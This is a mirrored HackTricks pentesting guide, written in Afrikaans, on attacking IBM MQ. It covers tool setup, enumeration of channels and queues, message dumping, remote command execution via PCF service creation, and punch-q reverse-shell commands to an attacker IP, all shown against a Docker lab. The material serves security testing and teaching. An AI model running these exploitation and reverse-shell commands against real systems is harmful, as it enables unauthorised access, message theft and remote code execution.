Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 22:20:43 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/1414-pentesting-ibmmq.md

345 lines
18 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 1414 - Pentesting IBM MQ
{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Ondersteun HackTricks</summary>
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basiese inligting
IBM MQ is 'n IBM tegnologie om boodskap rye te bestuur. Soos ander **boodskap broker** tegnologieë, is dit toegewy aan die ontvang, stoor, verwerk en klassifiseer van inligting tussen produsente en verbruikers.
Standaard, **dit stel IBM MQ TCP poort 1414 bloot**.
Soms kan HTTP REST API blootgestel word op poort **9443**.
Metings (Prometheus) kan ook vanaf TCP poort **9157** verkry word.
Die IBM MQ TCP poort 1414 kan gebruik word om boodskappe, rye, kanale, ... te manipuleer, maar **ook om die instansie te beheer**.
IBM bied 'n groot tegniese dokumentasie beskikbaar op [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq).
## Gereedskap
'n Voorstel gereedskap vir maklike eksploitatie is **[punch-q](https://github.com/sensepost/punch-q)**, met Docker gebruik. Die gereedskap gebruik aktief die Python biblioteek `pymqi`.
Vir 'n meer handmatige benadering, gebruik die Python biblioteek **[pymqi](https://github.com/dsuch/pymqi)**. [IBM MQ afhanklikhede](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) is nodig.
### Installeer pymqi
**IBM MQ afhanklikhede** moet geïnstalleer en gelaai word:
1. Skep 'n rekening (IBMid) op [https://login.ibm.com/](https://login.ibm.com/).
2. Laai IBM MQ biblioteke af van [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc). Vir Linux x86_64 is dit **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**.
3. Decomprimeer (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`).
4. Voer `sudo ./mqlicense.sh` uit om lisensievoorwaardes te aanvaar.
>As jy onder Kali Linux is, wysig die lêer `mqlicense.sh`: verwyder/comments die volgende lyne (tussen lyne 105-110):
>
>```bash
>if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
> then
> echo "ERROR: This package is incompatible with this system"
> echo " This package was built for ${BUILD_PLATFORM}"
> exit 1
>fi
>```
5. Installeer hierdie pakkette:
```bash
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
```
6. Voeg dan tydelik die `.so` lêers by LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64`, **voor** jy ander gereedskap gebruik wat hierdie afhanklikhede het.
Dan kan jy die projek [**pymqi**](https://github.com/dsuch/pymqi) kloon: dit bevat interessante kode-snippets, konstantes, ... Of jy kan die biblioteek direk installeer met: `pip install pymqi`.
### Gebruik punch-q
#### Met Docker
Gebruik eenvoudig: `sudo docker run --rm -ti leonjza/punch-q`.
#### Sonder Docker
Kloon die projek [**punch-q**](https://github.com/sensepost/punch-q) en volg dan die readme vir installasie (`pip install -r requirements.txt && python3 setup.py install`).
Daarna kan dit gebruik word met die `punch-q` opdrag.
## Enumerasie
Jy kan probeer om die **queue manager naam, die gebruikers, die kanale en die queues** te enumereer met **punch-q** of **pymqi**.
### Queue Manager
Soms is daar geen beskerming teen die verkryging van die Queue Manager naam nie:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR
```
### Kanale
**punch-q** gebruik 'n interne (veranderbare) woordlys om bestaande kanale te vind. Gebruik voorbeeld:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
```
Dit gebeur dat sommige IBM MQ instansies **onaangetekende** MQ versoeke aanvaar, so `--username / --password` is nie nodig nie. Natuurlik kan toegangregte ook verskil.
Sodra ons een kanaalnaam kry (hier: `DEV.ADMIN.SVRCONN`), kan ons al die ander kanale opnoem.
Die opnoeming kan basies gedoen word met hierdie kode-snippet `code/examples/dis_channels.py` van **pymqi**:
```python
import logging
import pymqi
logging.basicConfig(level=logging.INFO)
queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'
prefix = '*'
args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)
try:
response = pcf.MQCMD_INQUIRE_CHANNEL(args)
except pymqi.MQMIError as e:
if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
logging.info('No channels matched prefix `%s`' % prefix)
else:
raise
else:
for channel_info in response:
channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
logging.info('Found channel `%s`' % channel_name)
qmgr.disconnect()
```
... Maar **punch-q** inkorporeer ook daardie deel (met meer inligting!).
Dit kan begin word met:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...
| Name | Type | MCA UID | Conn Name | Xmit Queue | Description | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN | Server-connection | | | | | |
| DEV.APP.SVRCONN | Server-connection | app | | | | |
| SYSTEM.AUTO.RECEIVER | Receiver | | | | Auto-defined by | |
| SYSTEM.AUTO.SVRCONN | Server-connection | | | | Auto-defined by | |
| SYSTEM.DEF.AMQP | AMQP | | | | | |
| SYSTEM.DEF.CLUSRCVR | Cluster-receiver | | | | | |
| SYSTEM.DEF.CLUSSDR | Cluster-sender | | | | | |
| SYSTEM.DEF.RECEIVER | Receiver | | | | | |
| SYSTEM.DEF.REQUESTER | Requester | | | | | |
| SYSTEM.DEF.SENDER | Sender | | | | | |
| SYSTEM.DEF.SERVER | Server | | | | | |
| SYSTEM.DEF.SVRCONN | Server-connection | | | | | |
| SYSTEM.DEF.CLNTCONN | Client-connection | | | | | |
```
### Queues
Daar is 'n kode-snippet met **pymqi** (`dis_queues.py`) maar **punch-q** laat toe om meer stukke inligting oor die queues te verkry:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
Showing queues with prefix: "*"...
| Created | Name | Type | Usage | Depth | Rmt. QM | Rmt. Qu | Description |
| | | | | | GR Name | eue Nam | |
| | | | | | | e | |
|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local | Normal | 0 | | | |
| 0 18.35.1 | E | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.1 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.2 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.3 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
# Truncated
```
## Exploit
### Dump boodskappe
Jy kan rye(s)/kanaal(e) teiken om boodskappe uit hulle te snuffel / te dump (nie-destructiewe operasie). *Voorbeelde:*
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
```
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
```
**Moet nie huiwer om op alle geïdentifiseerde rye te iterate nie.**
### Kode-uitvoering
> Sommige besonderhede voordat ons voortgaan: IBM MQ kan op verskeie maniere beheer word: MQSC, PCF, Kontroleopdrag. Sommige algemene lyste kan gevind word in [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison).
> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmeerbare Opdrag Formate***) is waaroor ons fokus om op afstand met die instansie te kommunikeer. **punch-q** en verder **pymqi** is gebaseer op PCF-interaksies.
>
> Jy kan 'n lys van PCF-opdragte vind:
> * [Van PCF dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), en
> * [van konstantes](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes).
>
> Een interessante opdrag is `MQCMD_CREATE_SERVICE` en sy dokumentasie is beskikbaar [hier](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms). Dit neem as argument 'n `StartCommand` wat na 'n plaaslike program op die instansie verwys (voorbeeld: `/bin/sh`).
>
> Daar is ook 'n waarskuwing van die opdrag in die dokumentasie: *"Let op: Hierdie opdrag laat 'n gebruiker toe om 'n arbitrêre opdrag met mqm gesag uit te voer. As regte toegestaan word om hierdie opdrag te gebruik, kan 'n kwaadwillige of onverskillige gebruiker 'n diens definieer wat jou stelsels of data benadeel, byvoorbeeld deur noodsaaklike lêers te verwyder."*
>
> *Nota: altyd volgens IBM MQ dokumentasie (Administrasie Verwysing), is daar ook 'n HTTP-eindpunt by `/admin/action/qmgr/{qmgrName}/mqsc` om die ekwivalente MQSC-opdrag vir dienscreatie (`DEFINE SERVICE`) uit te voer. Hierdie aspek is nog nie hier behandel nie.*
Die dienscreatie / -verwydering met PCF vir afstandprogramuitvoering kan gedoen word deur **punch-q**:
**Voorbeeld 1**
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
```
> In die logs van IBM MQ kan jy lees dat die opdrag suksesvol uitgevoer is:
>
> ```bash
> 2023-10-10T19:13:01.713Z AMQ5030I: Die Opdrag '808544aa7fc94c48' het begin. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
> ```
Jy kan ook bestaande programme op die masjien opnoem (hier `/bin/doesnotexist` ... bestaan nie):
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
s "whatever"
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436
Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done
```
**Wees bewus dat die programontplooi asynchrone is. So jy het 'n tweede item nodig om die uitbuiting te benut** ***(luisteraar vir omgekeerde dop, lêer skep op 'n ander diens, data eksfiltrasie deur netwerk ...)***
**Voorbeeld 2**
Vir 'n maklike omgekeerde dop, **punch-q** bied ook twee omgekeerde dop payloads aan:
* Een met bash
* Een met perl
*Natuurlik kan jy 'n pasgemaakte een bou met die `execute` opdrag.*
Vir bash:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
Vir perl:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
### Custom PCF
Jy kan in die IBM MQ dokumentasie delf en direk die **pymqi** python biblioteek gebruik om spesifieke PCF opdragte te toets wat nie in **punch-q** geïmplementeer is nie.
**Example:**
```python
import pymqi
queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)
try:
# Replace here with your custom PCF args and command
# The constants can be found in pymqi/code/pymqi/CMQCFC.py
args = {pymqi.CMQCFC.xxxxx: "value"}
response = pcf.MQCMD_CUSTOM_COMMAND(args)
except pymqi.MQMIError as e:
print("Error")
else:
# Process response
qmgr.disconnect()
```
As jy nie die konstante name kan vind nie, kan jy na die [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors) verwys.
> *Voorbeeld vir [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Desimaal = 73). Dit benodig die parameter `MQCA_CLUSTER_NAME` (Desimaal = 2029) wat `*` kan wees (Dok: ):*
>
> ```python
> import pymqi
>
> queue_manager = 'MYQUEUEMGR'
> channel = 'DEV.ADMIN.SVRCONN'
> host = '172.17.0.2'
> port = '1414'
> conn_info = '%s(%s)' % (host, port)
> user = 'admin'
> password = 'passw0rd'
>
> qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
> pcf = pymqi.PCFExecute(qmgr)
>
> try:
> args = {2029: "*"}
> response = pcf.MQCMD_REFRESH_CLUSTER(args)
> except pymqi.MQMIError as e:
> print("Error")
> else:
> print(response)
>
> qmgr.disconnect()
> ```
## Toetsomgewing
As jy die IBM MQ gedrag en exploits wil toets, kan jy 'n plaaslike omgewing opstel gebaseer op Docker:
1. Om 'n rekening op ibm.com en cloud.ibm.com te hê.
2. Skep 'n gekonteiniseerde IBM MQ met:
```bash
sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
```
Deur standaard is die outentisering geaktiveer, die gebruikersnaam is `admin` en die wagwoord is `passw0rd` (Omgewing veranderlike `MQ_ADMIN_PASSWORD`). Hier is die wagterbestuurder se naam gestel op `MYQUEUEMGR` (veranderlike `MQ_QMGR_NAME`).
Jy moet die IBM MQ aan en loop hê met sy poorte blootgestel:
```bash
sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
58ead165e2fd icr.io/ibm-messaging/mq:9.3.2.0-r2 "runmqdevserver" 3 seconds ago Up 3 seconds 0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp testing-ibmmq
```
> Die ou weergawe van IBM MQ docker beelde is by: https://hub.docker.com/r/ibmcom/mq/.
## References
* [mgeeky's gist - "Praktiese IBM MQ Penetrasie Toetsing notas"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
* [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
* [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq)
Reference in a new issue View git blame Copy permalink